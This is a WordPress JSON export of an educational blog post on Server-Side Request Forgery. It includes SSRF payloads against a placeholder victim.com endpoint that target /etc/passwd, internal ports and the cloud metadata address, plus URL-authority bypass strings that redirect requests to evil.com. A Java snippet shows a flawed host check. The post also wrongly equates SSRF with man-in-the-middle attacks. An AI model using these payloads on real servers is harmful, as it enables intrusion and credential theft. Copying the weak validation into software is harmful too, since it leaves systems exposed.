{"id":10831,"date":"2024-01-25T19:58:38","date_gmt":"2024-01-25T19:58:38","guid":{"rendered":"https:\/\/temperies.com\/?p=10831"},"modified":"2024-01-26T12:51:35","modified_gmt":"2024-01-26T12:51:35","slug":"server-side-request-forgery-2","status":"publish","type":"post","link":"https:\/\/temperies.com\/es\/2024\/01\/25\/server-side-request-forgery-2\/","title":{"rendered":"Server-Side Request Forgery"},"content":{"rendered":"<p class=\"has-large-font-size\">Server-Side Request Forgery<\/p>\n\n\n\n<p class=\"is-style-plain\">This attack vector exploits vulnerabilities in server communication by manipulating network connections established by the application server. This manipulation, known as man-in-the-middle (MITM) or session hijacking, allows attackers to:<\/p>\n\n\n\n<ul><li><strong>Redirect server requests:<\/strong>&nbsp;Instead of reaching their intended destination,&nbsp;requests get rerouted to malicious actors who can intercept and alter data.<\/li><li><strong>Port scan internal servers:<\/strong>&nbsp;By analyzing traffic flow,&nbsp;attackers can identify and map internal servers,&nbsp;increasing their attack surface.<\/li><li><strong>Expose sensitive data:<\/strong>&nbsp;Intercepted requests or responses might contain confidential information like user credentials or financial data.<\/li><li><strong>Access cloud service metadata:<\/strong>&nbsp;Attackers can potentially exploit leaked metadata to gain unauthorized access to cloud storage and databases.<\/li><li><strong>Compromise internal services:<\/strong>&nbsp;Once inside the network,&nbsp;attackers can infiltrate and exploit internal services,&nbsp;causing critical disruptions.<\/li><\/ul>\n\n\n\n<p class=\"has-large-font-size\">SSRF versus Infrastructure<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" width=\"1696\" height=\"776\" src=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image.png\" alt=\"\" class=\"wp-image-10835\" srcset=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image.png 1696w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-768x351.png 768w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1536x703.png 1536w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-18x8.png 18w\" sizes=\"(max-width: 1696px) 100vw, 1696px\" \/><\/figure>\n\n\n\n<p>Below you can see the vulnerability examples<\/p>\n\n\n\n<p><strong>Affected Endpoint:<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=https:\/\/internal.victim.com\/storage\/logo.png<\/p>\n\n\n\n<p><strong>Payloads:<\/strong><\/p>\n\n\n\n<ul><li>file:\/\/\/etc\/passwd<\/li><li>http:\/\/localhost:8080\/<\/li><li>https:\/\/internal.victim.com:3306\/<\/li><li>http:\/\/169.254.169.254\/metadata\/v1.json<\/li><li>https:\/\/kubernetes.default.svc\/metrics<\/li><\/ul>\n\n\n\n<p>ftp:\/\/internal.victim.com<\/p>\n\n\n\n<p><strong>Affected Endpoint (weak host validation):<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=storage\/logo.png<\/p>\n\n\n\n<p><strong>Sample code:<\/strong><\/p>\n\n\n\n<p>String baseUrl = &#8220;http:\/\/internal.victim.com&#8221;;<br>String resource = String.format(&#8220;%s\/%s&#8221;, baseUrl, rid);<br>if (resource.startsWith(baseUrl)) {<br>&nbsp; HttpResponse response = (new HttpClient()).target(resource).get();<br>&nbsp; return (response.getStatus() == 200)<br>&nbsp; &nbsp; &nbsp; ? response.getStream()<br>&nbsp; &nbsp; &nbsp; : response.getErrorMessage();<br>}<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img width=\"1292\" height=\"454\" src=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1.png\" alt=\"\" class=\"wp-image-10836\" srcset=\"https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1.png 1292w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1-768x270.png 768w, https:\/\/temperies.com\/wp-content\/uploads\/2024\/01\/image-1-18x6.png 18w\" sizes=\"(max-width: 1292px) 100vw, 1292px\" \/><\/figure>\n\n\n\n<p><strong>Authority composition<\/strong><\/p>\n\n\n\n<ul><li>example.com<\/li><li>example.com:8080<\/li><li>user@example.com<\/li><li>user:passwd@example.com<\/li><li>user:passwd@example.com:443<\/li><\/ul>\n\n\n\n<p><strong>Back in business<\/strong><\/p>\n\n\n\n<p><strong>Affected Endpoint (weak host validation):<\/strong><\/p>\n\n\n\n<p>https:\/\/victim.com\/api\/v1\/ui\/getresource?rid=storage\/logo.png<\/p>\n\n\n\n<p><strong>Payloads:<\/strong><\/p>\n\n\n\n<ul><li>\/storage\/logo.png<\/li><li>@evil.com\/storage\/logo.png<\/li><li>@evil.com:443\/storage\/logo.png<\/li><li>@evil.com:443#\/storage\/logo.png<\/li><li>:dummy@evil.com:443#\/storage\/logo.png<\/li><li>http:\/\/internal.victim.com:dummy@<strong>evil.com:443<\/strong>#\/storage\/logo.png<\/li><\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>Source: <\/p>\n\n\n\n<ul><li><a rel=\"noreferrer noopener\" href=\"https:\/\/vulncat.fortify.com\/en\/detail?id=desc.dataflow.apex.server_side_request_forgery#Java%2FJSP\" target=\"_blank\">https:\/\/vulncat.fortify.com\/en\/detail?id=desc.dataflow.apex.server_side_request_forgery#Java%2FJSP<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/owasp.org\/Top10\/A10_2021-Server-Side_Request_Forgery_(SSRF)\/\" target=\"_blank\">https:\/\/owasp.org\/Top10\/A10_2021-Server-Side_Request_Forgery_(SSRF)\/<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf\" target=\"_blank\">https:\/\/www.blackhat.com\/docs\/us-17\/thursday\/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/knowledge-base.secureflag.com\/vulnerabilities\/server_side_request_forgery\/server_side_request_forgery_java.html\" target=\"_blank\">https:\/\/knowledge-base.secureflag.com\/vulnerabilities\/server_side_request_forgery\/server_side_request_forgery_java.html<\/a><\/li><li><a rel=\"noreferrer noopener\" href=\"https:\/\/docs.fluidattacks.com\/criteria\/fixes\/java\/100\/\" target=\"_blank\">https:\/\/docs.fluidattacks.com\/criteria\/fixes\/java\/100\/<\/a><\/li><\/ul>","protected":false},"excerpt":{"rendered":"<p>Server-Side Request Forgery This attack vector exploits vulnerabilities in server communication by manipulating network connections established by the application server. This manipulation, known as man-in-the-middle (MITM) or session hijacking, allows attackers to: Redirect server requests:&nbsp;Instead of reaching their intended destination,&nbsp;requests get rerouted to malicious actors who can intercept and alter data. Port scan internal servers:&nbsp;By&hellip;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[49],"tags":[50,53,51,52],"_links":{"self":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831"}],"collection":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/comments?post=10831"}],"version-history":[{"count":6,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831\/revisions"}],"predecessor-version":[{"id":10840,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/posts\/10831\/revisions\/10840"}],"wp:attachment":[{"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/media?parent=10831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/categories?post=10831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/temperies.com\/es\/wp-json\/wp\/v2\/tags?post=10831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}